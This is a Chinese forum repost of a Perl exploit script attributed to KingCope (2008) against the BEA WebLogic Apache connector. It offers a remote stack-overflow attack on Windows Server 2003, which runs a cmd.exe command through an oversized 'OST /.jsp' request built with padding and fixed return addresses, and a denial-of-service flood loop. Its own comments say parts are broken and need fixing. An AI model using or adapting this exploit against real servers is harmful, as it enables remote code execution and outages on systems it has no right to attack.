• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit

    发布者: Error | 发布时间: 2025-6-28 22:50| 查看数: 78| 评论数: 0|帖子模式

    #// Bea Weblogic -- Apache Connector Remote Exploit  -1day
    #// Should stack break latest Windows Server 2003 <address space randomization>
    #// BIG THANKS TO
    #// "dong-hun you"(Xpl017Elz) in INetCop - for his paper
    #// "Title: Advanced exploitation in exec-shield (Fedora Core case study)"
    #// His technique works fine against Windows 2003 latest version.
    #//
    #// The code is broken, since I am chilling out for now
    #// SKIDDI BULLETPROOF
    #// You may fixup the DoS Code, Windows Code Works on English OSs
    #// KingCope -- July/2008

    use IO::Socket;
    use strict;

    $|=1;
    my $apacheport = 80; #// Touch
    ###
    my $wrongusage = 0;
    my $dodoshost = 0;

    ###############################################################################
    ### Target List Entries |Operating System and Patch Level / Kernel Version|
    ###############################################################################
    my @targets = ();
    my @tgtname = ();
    print "-" x 80;
    $targets[0] = "1 Windows Server 2003 Enterprise Edition SP2 RC1 -- English\n";
    $tgtname[0] = $targets[0];
    $targets[100] = "2 Denial of Service\n";
    $tgtname[100] = $targets[100];

    ###############################################################################
    ### Print Of Target List And Usage
    ###############################################################################
    print "\n";

    print "Bea Weblogic -- Apache Connector Remote Exploit\n\n";
    print "Target List:\n";

    foreach my $target (@targets) {
    print $target;
    }
    print "\n\n";
    print "-" x 80;
    print "Usage: perl bea-unlock.pl <hostname or ip> <target>";
    print "\n";

    printusage:
    if ($wrongusage == 1) { exit; }

    ################################################################################
    ### Argument Parsing
    ################################################################################
    my $host = $ARGV[0];
    my $target = $ARGV[1];

    if (($host == "") || ($target == "")) {
    $wrongusage = 1;
    goto printusage;
    }

    ################################################################################
    ### Setup Socket
    ################################################################################
    setupsocket:
    my $sock = IO::Socket::INET->new(PeerAddr => $host,
                                    PeerPort => $apacheport,
                                    Proto    => 'tcp');
    if ($dodoshost == 1) {
    goto doshost;
    }
    ################################################################################
    ### Select Target
    ################################################################################
    if ($target == 1) {
    print "Exploiting $host -- " . $tgtname[$target-1];
    goto winexpl;
    }

    if ($target == 2) {
        print "Attacking Host $host -- Denial of Service -- Wait ...\n";
    goto doshost;
    }

    ################################################################################
    ### Exploitation of Windows Versions
    ################################################################################
    winexpl:
    ####WORKS [LOOKUP THE HOSTNAME]
    my $command = "echo works > c:\\desiredfile.txt";

    my $cmds = "cmd.exe /c \"$command\"|";

    my $sc = $cmds;

    #### STACKBREAKING WITH WINEXEC() ON WINDOWS

    my $c = "C" x 97 . pack("L", 0x10013930) x 3 . pack("L", 0x10013930) . pack("L", 0x10013931) . pack("L",0x77EA411E);
    my $a = $cmds . "A" x (4000-length($cmds)) . $c;

    print $sock "OST /.jsp $a\r\nHost: localhost\r\n\r\n";

    while (<$sock>) {
    print;
    }
    ################################################################################
    ### Denial of Service Against The Apache Frontend Module For Bea Weblogic
    ################################################################################
    ####NEEDS SOME FIXUP
    doshost:
    $dodoshost = 1;

    while(1) {
    $a = "A" x 6000;
    goto setupsocket;
    print $sock "OST /.jsp $a\r\n\r\nHost: localhost\r\n\r\n";
    while(read($sock,$_,100)) {
    my $dosagain = 0;

    if ($dosagain eq 1) {
    "Server is down now\n";
    exit;
    }

    if ($_ =~ /Server/) {
    print ".";
    $dosagain = 1;
    next;
    }
    }
    }


    来源:https://www.jb51.net/hack/5721.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    浏览过的版块

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表